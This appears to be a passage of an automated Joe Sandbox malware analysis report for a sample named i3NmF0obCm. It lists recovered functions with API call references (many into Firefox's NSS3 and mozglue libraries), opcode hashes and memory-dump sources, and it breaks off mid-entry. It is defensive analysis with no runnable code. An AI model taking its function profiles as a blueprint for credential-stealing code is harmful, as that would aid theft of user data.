Opcode ID: cf20b6a3600e8d2612ce39a99fb87066e02675aafdb1b20392307a1751852e6a
Instruction ID: 31ea62259905690af3332b0171df558b458cc4f525fdb3e2aca26873c3c1e316
Opcode Fuzzy Hash: cf20b6a3600e8d2612ce39a99fb87066e02675aafdb1b20392307a1751852e6a
Instruction Fuzzy Hash: CB31E1B1A00116AFEB008FA4DC45BBFB7A4EF48318F104126FE1996690E730D864C7BA

Function 6C5EEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5EEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C5EEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C5EEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5EEEEB
free.MOZGLUE(?), ref: 6C5EEEF6

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 59bd906f1beaf32265c6d168236629e680467fb6e6c8dd0da6fe6b818a7a769c
Instruction ID: 06f60d52207fc006d950c3560431738e6cc4019c3f1bbbb744136199fb9434e0
Opcode Fuzzy Hash: 59bd906f1beaf32265c6d168236629e680467fb6e6c8dd0da6fe6b818a7a769c
Instruction Fuzzy Hash: 4D31F6B1A106019BEB209F28CC44B667BF4FB4E315F540939E85E87B51EB71E814CBE1

Function 6C5F44D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C5F44FF

Part of subcall function 6C6507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5F8298,?,?,?,6C5EFCE5,?), ref: 6C6507BF
Part of subcall function 6C6507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6507E6
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C65081B
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C650825

SECOID_FindOID_Util.NSS3(?), ref: 6C5F4524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5F4537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C5F4579

Part of subcall function 6C5F41B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C5F41BE
Part of subcall function 6C5F41B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5F41E9
Part of subcall function 6C5F41B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C5F4227
Part of subcall function 6C5F41B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C5F423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5F459C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 9ccb734a975c3c8beec225c2f0ce567aff6d91df0f8c6e0a7ef078f38e56db46
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 7D21D8716012009BF71AEE25DE44F6B37A99F81658F140828BC35CBB53F721E906CE91

Function 6C5FAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C5F3FFF,00000000,?,?,?,?,?,6C5F1A1C,00000000,00000000), ref: 6C5FADA7

Part of subcall function 6C6514C0: TlsGetValue.KERNEL32 ref: 6C6514E0
Part of subcall function 6C6514C0: EnterCriticalSection.KERNEL32 ref: 6C6514F5
Part of subcall function 6C6514C0: PR_Unlock.NSS3 ref: 6C65150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C5F3FFF,00000000,?,?,?,?,?,6C5F1A1C,00000000,00000000), ref: 6C5FADB4

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C5F3FFF,?,?,?,?,6C5F3FFF,00000000,?,?,?,?,?,6C5F1A1C,00000000), ref: 6C5FADD5

Part of subcall function 6C64FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C648D2D,?,00000000,?), ref: 6C64FB85
Part of subcall function 6C64FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C64FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7194B0,?,?,?,?,?,?,?,?,6C5F3FFF,00000000,?), ref: 6C5FADEC

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5F3FFF), ref: 6C5FAE3C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 4c373623881c79c00a50523c41489ec4ffe4982f47cd7375db41bc34abcd133e
Instruction ID: 1e44cb7037c7dba2a85f61f73cb2ad70d8d49088a0193b954d8fa8176b1a3a4e
Opcode Fuzzy Hash: 4c373623881c79c00a50523c41489ec4ffe4982f47cd7375db41bc34abcd133e
Instruction Fuzzy Hash: 48115971E002045BE7009A659C40BBF73A89F9214DF048128EC2996641FB20F9598AAB

Function 6C648800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648821
TlsGetValue.KERNEL32(?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C64883D
EnterCriticalSection.KERNEL32(?,?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C648887
PR_Unlock.NSS3(?,?,?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648899

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 03d28a3ff7cd547dd7dc51b431be6d5cbce9e8c5cb766828187e4a1ffe26002a
Instruction ID: 01914a3d728dd76079575dfe86304cfe14d9f0aeecdda1d77ca1843af79d1f0a
Opcode Fuzzy Hash: 03d28a3ff7cd547dd7dc51b431be6d5cbce9e8c5cb766828187e4a1ffe26002a
Instruction Fuzzy Hash: 91214CB4A04605CFDB00AF78C4841AABBF4FF49349F11C66ADC94D6651EB30D894CBD6

Function 00EF4850 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(00EFE988,?,?,00EF4A41,00000000,?,013214B8,?,00EFE988,?,00000000,?), ref: 00EF489C
sscanf.NTDLL ref: 00EF48C9
SystemTimeToFileTime.KERNEL32(00EFE988,00000000,?,?,?,?,?,?,?,?,?,?,?,013214B8,?,00EFE988), ref: 00EF48E2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,013214B8,?,00EFE988), ref: 00EF48F0
ExitProcess.KERNEL32 ref: 00EF490A

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 0f1eb818dc77132e2e94adfd9017388a09c824a9f860a392707168a0ced274c7
Instruction ID: 0e4e38ace50375c3e311f823c6bc31e43f3e9f0e4ef00f6a7e039b947fe608ee
Opcode Fuzzy Hash: 0f1eb818dc77132e2e94adfd9017388a09c824a9f860a392707168a0ced274c7
Instruction Fuzzy Hash: D821EAB5D1020DABCF48EFE4E9459EEB7BABF48300F04852EE516B3244EB745604CB69

Function 6C6804C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C68461B,-00000004), ref: 6C6804DF
TlsGetValue.KERNEL32(?,00000000,?,6C68461B,-00000004), ref: 6C680510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C680520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C68461B,-00000004), ref: 6C680534
GetLastError.KERNEL32(?,6C68461B,-00000004), ref: 6C680543

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: a5be37907f64bd9223e5f4a78a407f025f48439cf53000ebb6c4cf49a2d7aee9
Instruction ID: 7a6a129abbc48bb56c3b669950bbd211b53fa0dfad5f3b19f1ac6c01a2fdb99e
Opcode Fuzzy Hash: a5be37907f64bd9223e5f4a78a407f025f48439cf53000ebb6c4cf49a2d7aee9
Instruction Fuzzy Hash: 56112771A07141ABDB107B38DD14B663664EF4631DF614E25E429C39D0EF31D544CBBA

Function 6C608FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C610710), ref: 6C608FF1
PR_CallOnce.NSS3(6C752158,6C609150,00000000,?,?,?,6C609138,?,6C610710), ref: 6C609029
calloc.MOZGLUE(00000001,00000000,?,?,6C610710), ref: 6C60904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C610710), ref: 6C609066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C610710), ref: 6C609078

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 1611a79117cbdad90784adf39a1f8fc5fa4bf06655ffad38649ff2cbe3ded2c6
Instruction ID: 6aeb4499b21770bc01f2c0de3d5ba7108ca2d01ab9a719165f7d250996e20248
Opcode Fuzzy Hash: 1611a79117cbdad90784adf39a1f8fc5fa4bf06655ffad38649ff2cbe3ded2c6
Instruction Fuzzy Hash: FA11447170011197E7281AADAD04A6732ADEB827ACF800439FC85E2B81FB92CD54C7B9

Function 6C61CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C631E10: TlsGetValue.KERNEL32 ref: 6C631E36
Part of subcall function 6C631E10: EnterCriticalSection.KERNEL32(?,?,?,6C60B1EE,2404110F,?,?), ref: 6C631E4B
Part of subcall function 6C631E10: PR_Unlock.NSS3 ref: 6C631E76

free.MOZGLUE(?,6C61D079,00000000,00000001), ref: 6C61CDA5
PK11_FreeSymKey.NSS3(?,6C61D079,00000000,00000001), ref: 6C61CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C61D079,00000000,00000001), ref: 6C61CDCF
DeleteCriticalSection.KERNEL32(?,6C61D079,00000000,00000001), ref: 6C61CDE2
free.MOZGLUE(?), ref: 6C61CDE9

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 79dac48e4f96d4eb395ce8346014711fe0f24dc6915f05ab43d587833e46a032
Instruction ID: bb7b3ab81a1da2d2299583254c193ae67d2965c5e7969b704f3200da98bc249d
Opcode Fuzzy Hash: 79dac48e4f96d4eb395ce8346014711fe0f24dc6915f05ab43d587833e46a032
Instruction Fuzzy Hash: AB11A3B2B05115BBDB00AB69EC4599A777CBB0536A7144532E90A87E01D732E428C7E5

Function 6C682CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C685B40: PR_GetIdentitiesLayer.NSS3 ref: 6C685B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C682CEC

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_EnterMonitor.NSS3(?), ref: 6C682D02
PR_EnterMonitor.NSS3(?), ref: 6C682D1F
PR_ExitMonitor.NSS3(?), ref: 6C682D42
PR_ExitMonitor.NSS3(?), ref: 6C682D5B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 326535218dff9be1977b6d8dd5a70253e101b9c7df2382dc5a3240fb2947c2a5
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 5501C8B29012005BE6309E29FC40BC7B7F1EF5631CF004525E95E96710D632F42587AA

Function 6C682D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C685B40: PR_GetIdentitiesLayer.NSS3 ref: 6C685B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C682D9C

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_EnterMonitor.NSS3(?), ref: 6C682DB2
PR_EnterMonitor.NSS3(?), ref: 6C682DCF
PR_ExitMonitor.NSS3(?), ref: 6C682DF2
PR_ExitMonitor.NSS3(?), ref: 6C682E0B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 7cd4c9815f44bec00dd0bf5ea3cfa2a32ea78e0434753dc7cc238d5df124e0a7
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 6901A1B1A012006BEA309E29FC05BC7B7B1EF5231CF000439E85A96B11D632E82587BE

Function 6C61AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C603090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C61AE42), ref: 6C6030AA
Part of subcall function 6C603090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6030C7
Part of subcall function 6C603090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6030E5
Part of subcall function 6C603090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C603116
Part of subcall function 6C603090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C60312B
Part of subcall function 6C603090: PK11_DestroyObject.NSS3(?,?), ref: 6C603154
Part of subcall function 6C603090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5F99FF,?,?,?,?,?,?,?,?,?,6C5F2D6B,?), ref: 6C61AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5F99FF,?,?,?,?,?,?,?,?,?,6C5F2D6B,?), ref: 6C61AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5F2D6B,?,?,00000000), ref: 6C61AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C5F2D6B,?,?,00000000), ref: 6C61AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C5F2D6B,?,?), ref: 6C61AEA3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 28a28ffd624c4a67a86148dcae4591b0f859c2772a3e5429419624c06d1dafbc
Instruction ID: 38879f8b7cf8ac04984f70f666288134d6ab5fdf913157f76ba7472f5bafbf18
Opcode Fuzzy Hash: 28a28ffd624c4a67a86148dcae4591b0f859c2772a3e5429419624c06d1dafbc
Instruction Fuzzy Hash: B401C867B0811057E701916CAC85AEF31998F8765EF084431E90AD7F53F616DD0E52EF

Function 00EF7170 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0132FDC8,?,?,?,00EF074C,?,0132FDC8,00000000), ref: 00EF717C
lstrcpyn.KERNEL32(01106310,0132FDC8,0132FDC8,?,00EF074C,?,0132FDC8), ref: 00EF71A0
lstrlen.KERNEL32(?,?,00EF074C,?,0132FDC8), ref: 00EF71B7
wsprintfA.USER32 ref: 00EF71D7

Strings

%s%s, xrefs: 00EF71C5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: d0dd4794a342bb54e2bf1fb0326b370aeebfafaceb2e424bdf8a4b96f2fd3508
Instruction ID: 0a155566e7eca67319d807a2d837b225643fb7acee86d34e7cb089974804b678
Opcode Fuzzy Hash: d0dd4794a342bb54e2bf1fb0326b370aeebfafaceb2e424bdf8a4b96f2fd3508
Instruction Fuzzy Hash: 58011E75904108FFCB09DFA8C954EAE7B79EB48344F108558F9199F245CBB1AE90CB90

Function 6C70ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C70A6D8), ref: 6C70AE0D
